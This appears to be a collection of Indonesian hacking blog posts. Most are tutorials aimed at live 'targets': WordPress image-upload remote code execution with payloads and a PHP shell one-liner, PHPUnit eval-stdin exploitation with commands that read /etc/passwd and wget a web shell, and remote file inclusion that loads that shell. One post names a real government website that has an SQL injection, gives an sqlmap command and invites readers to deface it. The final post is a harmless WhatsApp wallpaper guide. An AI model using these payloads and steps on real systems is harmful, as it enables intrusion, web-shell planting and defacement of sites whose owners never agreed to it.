-

Hai sobat

Saya ikal,

Disini saya akan share sesuatu lagi.

-


Kali ini saya akan bahas cara menemukan loginan WordPress yang dihidden (disembunyikan). Biasanya mereka para admin WordPress menggunakan plugins untuk menyembunyikan login page dari website WordPress mereka masing - masing.


Disini ada 2 plugins yang populer atau biasa dipakai. Yaitu 

  1. WPS Hide Login.
  2. Easy Hide Login.

1. WPS Hide Login.
Pada plugins yang satu ini ada beberapa cara untuk menemukan login page yang disembunyikan, diantaranya : 

1. Trik #1
Kalian bisa akses parameter berikut untuk menemukan login page nya.
- https://localhost/wp-admin/?adminhash=1

- https://localhost/?action=rp&key&login


2. Trik #2

Disini kita hanya memanfaatkan default dari hidden login pagenya. Dan default pagenya biasanya adalah /login/ /login.php /admin/, Jika benar admin web tidak mengganti default hidden loginnya, maka kalian akan disuguhi login pagenya.


2. Easy Hide Login.

Pada plugins yang ini, kita hanya perlu mengakses default keynya saja, dan default keynya adalah root. Salin parameter dibawah dan pastekan dibelakang url target kalian.

- https://localhost/?root


Jika admin website menggunakan default key tsb, kalian akan dapat menemukan login pagenya hanya dengan mengakses parameter diatas.


Sekian aja untuk artikel kali ini. 

Referensi : 

https://secupress.me/blog/wps-hide-login-v1-5-2-2-multiples-vulnerabilities/


Thanks

See U

 


-

Hai Sobat

Saya ikal,

Disini saya akan sharing - sharing nih.

-


Jadi kali ini saya akan bahas mengenai cara deactive plugins pada wordpress tanpa harus melalui dashboard admin. Bagaimana caranya? Yuk simak!.


1. Login ke database.

yang pertama, tentu saja kalian harus mengetahui username,password,dan db name dari website yang ingin kita deactive pluginsnya. Apa kalian bisa tembus database tanpa hal - hal tadi? Heumm.


2. Proses deactivate.

hal yang kedua, Jika kita sudah masuk ke dalam database, kita cari table yang kira - kira belakangnya ada _options lalu kalian klik edit. Disini saya menggunakan adminer ya.



Dan jika sudah didalam table _options, kalian cari column yang bernama active_plugins lalu klik edit.


Dan didalam column tersebut akan muncul beberapa plugins yang telah aktif pada server. Dan sekarang jika kalian ingin deactive semua pluginsnya, kalian hapus saja semua tulisan yang ada pada kolom option_value lalu klik save.


Dan jika kalian hanya ingin menonaktifkan salah satunya saja, kalian bisa hapus dari huruf i sampai ";. Contoh : i:6;s:25:"gtranslate/gtranslate.php";


Ngokey segitu aja untuk artikel kali ini.

Thanks

See U


 -

Hai Sobat

Saya ikal,

Disini saya akan sharing sharing nih.

-


Kali ini kita akan membahas salah satu exploit yang sudah lumayan tua yaitu Remote Code Execution pada WordPress via image uploaded. Saya akan menjelaskan step,payload,dan lainnya secara rinci dan saya harap kalian mengerti.


Bahan : 

- Exiftool or Jhead

- BurpSuite : Download diwebsite resmi postwigger

- Payload : 

  1. &meta_input[_wp_attached_file]=year/month/filename#/filename
  2. &meta_input[_wp_attached_file]=year/month/filename#/../../../../themes/themename/filename
  3. &meta_input[_wp_page_template]=cropped filename

1. Create malicious image.
Hal pertama yang harus kita lakukan adalah memasukan php code kedalam sebuah gambar. kita bisa gunakan tools yang bernama Jhead,dan Exiftool. Untuk step ini kalian mungkin sudah pada paham, jika belum paham copy dan pastekan salah satu command dibawah pada terminal kalian.

jhead -ce filename.jpg

exiftool -Comment="<?php echo shell_exec(\$_POST['yolo']); ?>"

 

atau kalian bisa gunakan punya saya yang sudah jadi.




2. Upload the image.

Setelah kalian melakukan step 1, lanjut kalian jalankan burpsuite pada device kalian masing - masing. Akses target kalian dan lakukan login dengan akun yang ada.



Jika sudah login,kalian pergi ke Media lalu Klik Add New atau kalian bisa akses saja langsung dengan menempelkan /media-new.php pada search bar tepat setelah /wp-admin/. Sebelumnya,pastikan Intercept pada BurpSuite kalian Off terlebih dahulu. Kembali ke topik jika kalian sudah mengakses url diatas kalian klik Select Files lalu upload File gambar yang telah disisipi php code tadi. Biarkan penguploadan selesai hingga 100% lalu muncul button edit.



Jika sudah seperti gambar diatas, kalian klik Edit lalu balik ke BurpSuite, Aktifkan Intercept dan kembali ketarget kalian dan klik tombol biru bertuliskan Update dan cek requestan yang ditangkap oleh BurpSuite.



Klik Action lalu klik Send to repeater. "Bang kalo isi requestannya beda masalah ga bang?" Ga masalah. Lanjut,jika sudah dikirim ke repeater kalian Nonaktifkan Interceptnya dengan mengklik Intercept Is On.


Jika sudah,kalian akses Media lalu klik Library pada target kalian. atau kalian dapat menempelkan /upload.php setelah /wp-admin/. Klik gambar kalian, biasanya dipaling pojok kiri atas.



Klik Edit Image dan pangkas gambar kalian. Unuk cara pangkasnya kalian pikir pikir sendiri. Balik ke BurpSuite lalu nyalakan Interceptnya, Akses target kalian lalu klik Save.


Cek BurpSuite kalian klik Action,Send to repeater request yang ada lalu Off kan kembali Interceptnya.


3. Exploit step

Jika step 1 dan 2 sudah kalian jalankan dengan benar. lanjut ke step 3, kalian ke BurpSuite dan klik yang bertuliskan Repeater. Disana ada 2 requestan dari step 2.



Salin payload pertama yang ada diatas ubah year menjadi tahun,month menjadi bulan,filename menjadi nama gambar yang diupload. Tempelkan payloadnya dibarisan paling bawah pada requestan pertama.



Jika sudah,klik send dan pergi kerequestan yang kedua dan klik send. Lihat dibagian Response apakah tulisan # dan seterusnya akan tereksekusi atau tidak. Jika muncul maka kemungkinan target kalian vuln,jika tidak muncul skip dan cari target yang lain saja.



Nah muncul :D. Lanjut kita salin payload kedua dan seperti tadi kita ubah year menjadi tahun,month menjadi bulan,filename menjadi gambar yang kalian upload,dan themename menjadi nama theme yang terpakai pada target kalian. Akses requestan pertama hapus payload sebelumnya dan pastekan payload yang kedua tadi dan klik Send.


Untuk mengetahui tema apa yang dipakai,kalian akses halaman index target kalian dan lakukan view-source. Ctrl + F ketikan /themes/ lalu enter.



balik lagi ke requestan yang kedua klik send aja langsung dan lihat pada response apakah payload berhasil masuk atau tidak.



Nah jika muncul #/blablabla berarti payload berhasil dieksekusi. Okeh lanjut ke tahap terakhir. pertama kalian salin nama file yang tercantum pada requestan kedua tepatnya sesudah /namatheme/. 


Akses target kalian lalu klik Posts lalu Add New. Untuk title bisa kalian isi asal saja, dan untuk isi postnya kalian kosong kan saja.



Balik ke BurpSuite dan aktifkan Interceptnya. Jika sudah On, Kalian balik ketarget dan klik Submit For Review untuk mempublish artikelnya. Cek BurpSuite dan klik Action,Send to repeater request yang ada lalu Off kan Interceptnya. 


Salin payload ketiga dan ganti cropped filename dengan nama file yang kalian dapat pada request kedua, kalo ga ngerti scroll atas lagi dah. Pergi ke BurpSuite dan klik Repeater. Scroll kebawah dan tempelkan payload ketiga tadi lalu klik Send.



Jika sudah. kalian tinggal akses saja artikelnya dengan cara seperti ini.

https://localhost/?p=[id]


idnya bisa kalian dapat pada request ketiga. ketikan post_id pada search bar BurpSuite kalian dan itulah id dari post kalian tadi. Jika exploitasi dilakukan dengan benar dan target memang vuln,maka post yang muncul bukanlah tulisan,dan sebagainya melainkan akan muncul isi dari file gambar yang telah kalian sisipi php code tadi.



Dan untuk RCE nya kalian tinggal lakukan seperti ini.

https://localhost/?p=[id]


Post : 

yoloo=[command]


Ettt mungkin kalian sudah baca dari atas sampai sini,Dan otak kalian bingung :D. tenang disini sekalian saya post tentang botnya. Jadi kalian tidak perlu exploitasi step by step sendiri :D kalian cukup jalankan botnya dengan command.


python3 49512.py https://localhost/ username password temayangdipakai

 


Scriptnya bisa didownload dibawah ini.



NB : Pastikan file gambar dan script exploit berada disatu folder yang sama.


Referensi : 

https://www.exploit-db.com/exploits/49512


Thanks

See U

 


-

Hai sobat

Saya ikal,

Disini saya akan sharing sesuatu nih.

-


kali ini kita akan bahas mengenai xploit yang udah lama banged lah yah. pasti dari judul kalian mungkin sebagian dah tau mengenai exploit ini. yah gapapa lah post aja :D. 

Bahan : 

- Shell backdoor : 

https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php

- Exploit : 

https://localhost/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

https://localhost/[path]/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

- Burpsuite

- Command : 

For read phpinfo : <?php phpinfo(); ?>

For read passwd file : <?php system('tail /etc/passwd'); ?>

For read all file in this directory : <?php system('dir'); ?>

For spawn ur shell : <?php system('wget https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php'); ?>


langsung saja masuk ketahap exploitasinya. Open burpsuite kalian masing masing, klik yang bertuliskan Proxy lalu klik yang bertuliskan Intercept Is On jika sudah, klik Open Browser. Klik Intercept Is Off lalu buka website target kalian beserta exploitnya (pastikan saat mengakses file eval-stdin.php isinya blank/kosong). sebagai contoh seperti ini.



Klik enter dan cek burpsuite kalian, disana terdapat requestan yang ditangkap oleh burpsite dari server target kita. selanjutnya klik action dan klik Send to repeater.



Jika sudah, kalian klik yang bertuliskan Repeater.



Copy salah satu command diatas dan pastekan di bawah barisan Content-Length dan klik send.



Hasilnya akan muncul sesuai command yang kalian pakai, Untuk spawn shell,kalian pakai command wget diatas dan akses shellnya di :

https://localhost/vendor/phpunit/phpunit/src/Util/PHP/MARIJUANA.php

https://localhost/[path]/vendor/phpunit/phpunit/src/Util/PHP/MARIJUANA.php


Thanks

See U

 

-

Hai Sobat

Saya ikal,

Disini saya akan sharing sesuatu nih.

-


Kali ini kita akan membahas mengenai Vulnerability yang bernama RFI (Remote File Inclusion) Kerabat dekat LFI (Local File Inclusion) :D. Berbeda dengan LFI yang hanya menginclude file dari dalam server, RFI ini berkelebihan untuk menginclude file dari luar server. RFI sendiri terjadi saat function include tidak terfilter dengan baik.


 Seperti namanya yang ada remote - remotean, kita bisa mengeksekusi Code PHP atau sejenisnya yang berada dari luar server. Namun untuk melakukan RFI ini server harus mengenable function allow_url_include(), setting enable disable nya di file php.ini. 


Contoh script php yang memiliki kerentanan RFI : 


<?php 
    if (isset  ($_GET['page'])) 
    {   
        include $_GET['page'];
    } 
    else 
    {
        echo "<p>Hello World!</p>";
    }
    ?>

 

Dan jika kalian ingin mempraktekannya diserver kalian masing - masing. kalian bisa create file dengan nama php.ini, dan pastekan script berikut :


allow_url_include=On

 

Tampilan awal

Basic RFI Exploitation : 

https://localhost/vuln.php?page=google.com


Disini server kita akan membaca code dari index website google.com. Nah  kita bisa memanfaatkan server pastebin untuk host yang akan kita include yah. Disini saya coba asumsikan untuk menginclude text biasa dari https://pastebin.com/raw/JUfpvPwZ untuk include pada server yang vuln RFI tadi.


Letakan url pastebin dibelakang parameter, Contoh :

https://localhost/vuln.php?page=https://pastebin.com/raw/JUfpvPwZ

atau seperti ini

https://localhost/vuln.php?page=pastebin.com/raw/JUfpvPwZ


Hasil

Outputnya sesuai dengan yang ada di https://pastebin.com/raw/JUfpvPwZ 



Now, How get RCE from Remote File Inclusion? So Simple dude :D. Pertama kalian buat lagi repository pastebinnya, namun kali ini kita isi dengan Code PHP, Contoh disini kita akan memunculkan phpinfo, dan ini repository yang akan kita include ke server target https://pastebin.com/raw/xTahsBha.


Pastekan url pastebin tersebut di parameter tadi.

https://localhost/vuln.php?page=https://pastebin.com/raw/xTahsBha

atau

https://localhost/vuln.php?page=pastebin.com/raw/xTahsBha


Hasil

Kita berhasil melakukan Code Execution :D. Kita juga bisa langsung mendapatkan shell, sama seperti tadi kita hanya perlu mempastekan url shellnya di parameter yang memiliki vulnerable RFI tersebut. Contoh kita akan memakai MARIJUANA shell. url shell : 

https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php


https://localhost/vuln.php?page=https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php

atau

https://localhost/vuln.php?page=raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php


Dan saat kita enter. Ini hasilnya.


Hasil

Gotcha :D. U got the shell. Namun walau Vulnerability Rfi ini cukup umum, Tapi jarang sekali saya menemukan website yang memiliki Vulnerability ini. Yah gitulah :D.


Untuk artikel mengenai Exploitasi RFI ini segini saja. Jika ada salah penulisan biarkan saja.

Reference : 

https://en.wikipedia.org/wiki/File_inclusion_vulnerability

https://www.youtube.com/watch?v=Z0zhFvdvF6o


Thanks

See U


 -

Hai Sobat

Saya ikal,

Disini saya akan sharing sesuatu nih.

-


Kali ini kita akan kembali membahas mengenai vulnerability lagi nih. Kali ini kita akan bahas vulnerability di WebApp "go.id" kembali :D.


Jadi awalnya ada temen saya ***ck_X12 yang minta saya iseng - iseng di CMS ini https://jdih.acehbaratdayakab.go.id/, Ga tau nama CMS nya apa, sekilas mirip ama AcehCMS jika dilihat dari admin loginnya :D. yaudah iseng - iseng aja dah buat ide artikel kan :D.


Tampilan


Singkat cerita i found this. pas saya cek cek, ternyata lumayan banyak yang pakai ini WebApp, kira - kira ada 15++ lebih yang pakai :D. yah sung aje gua publish ye kan. Okeh kita udahan aja basa basinya, Kita masuk lagi kepembahasan.


Description :

- Vulnerable Parameter :

https://localhost/dih/jsondata?status_dok=[value][SQL Injection]

https://localhost/[path]/dih/jsondata?status_dok=[value][SQL Injection]

- Admin Login :

https://localhost/secure/login

https://localhost/[path]/secure/login

- SQLmap Command :


$sqlmap.py -u "https://localhost/dih/jsondata?status_dok=*" --dbs


Yah, Karena saya dari awal hanya ingin iseng - iseng untuk ide konten, jadi yah segini aja artikelnya :D. Bagi yang mau lanjutkan ampe jadi Hacked By Hacked By an silakan. Dan juga jika ada salah kata atau salah penulisan biarkan saja.


Reference : 

https://www.draxploit.web.id/2020/08/penjelasan-penginstallan-dan-cara-pakai.html


Thanks

See U


 -

Hai sobat, 

Saya ikal, 

Disini saya akan membahas hal baru nih. 

-


Kita semua pasti sudah tau aplikasi WhatsApp, bahkan kalian juga sudah punya akun WhatsAppnya yah pasti :D. 


Disini saya akan share mengenai fiture baru WhatsApp yang menurut saya menarik, yaitu kita bisa mengatur WallPaper yang berbeda - beda dari setiap chat. Contohnya yah seperti yang ada di icon atas. Atau seperti yang dibawah ini. 



Sebenarnya tidak hanya ini fiture baru dari aplikasi WhatsApp sesudah update, Dilansir dari kompas.com setidaknya ada 8 fitur baru WhatsApp.


Kita balik kepembahasan pertama, sekarang,bagaimana caranya memakai fitur Multi Wallpaper atau apalah itu dalam bahasa inggris :D.


1. Melakukan update.

Hal yang pertama kalian harus lakukan adalah update versi WhatsApp kalian. Kalian pergi ke aplikasi PlayStore atau sejenisnya,lalu ketikan WhatsApp Pada kolom pencarian. Dan kalian tinggal klik saja tombol yang bertuliskan Update 


2. Jika sudah mengupdate WhatsAppnya, kalian langsung kalian buka saja aplikasi WhatsApp. Dan pilih bar chat mana yang ingin diberi WallPaper. Sebagai contoh disini saya akan memberi Wallpaper kucing dibar chat nomor saya sendiri.



Terlihat saya belum memasang Wallpaper, Wallpaper pada chat bar nomor saya menggunakan WallPaper default. Sekarang saya akan praktikan bagaimana cara mengganti WallPapernya. 


Pertama klik titik tiga dipojok kanan atas, lalu klik yang bertuliskan Wallpaper .



Dibagian ini kalian dapat mengatur kecerahan gambar wallpapernya. Kalian klik UBAH. 



Disini ada 3 option bawaan dari updatean WhatsApp, dimana telah disediakan Wallpaper-Wallpaper menarik untuk dipakai, jika ingin memakainya, kalian klik saja salah satu dari option yang bertuliskan Cerah,Gelap,Warna Solid (Full One Color). Namun disini kita akan memakai foto dari galeri kita masing - masing :D. Klik option yang bertuliskan Foto saya.


Pilih salah satu foto yang ada digaleri kamu untuk dijadikan wallpaper. Jika sudah, kalian klik saja fotonya, dan akan muncul seperti ini. 



Jika seperti itu, kalian klik tombol yang bertuliskan SETEL WALLPAPER. Dan akan muncul page pengaturan kecerahan seperti diawal tadi. 



Jika kecerahannya ingin normal, geser kekiri,dan jika ingin dikurangkan geser kekanan. Lalu klik tombol anak panah dipojok kiri atas. 



Dan taraa, 1 chat bar telah diganti wallpapernya. Kalian bisa ganti wallpaper dari kontak - kontak kalian sesuai keinginan :D.


Jika ada kesalahan penulisan kata atau yang lainnya biarkan saja :"D. 


Thanks

See U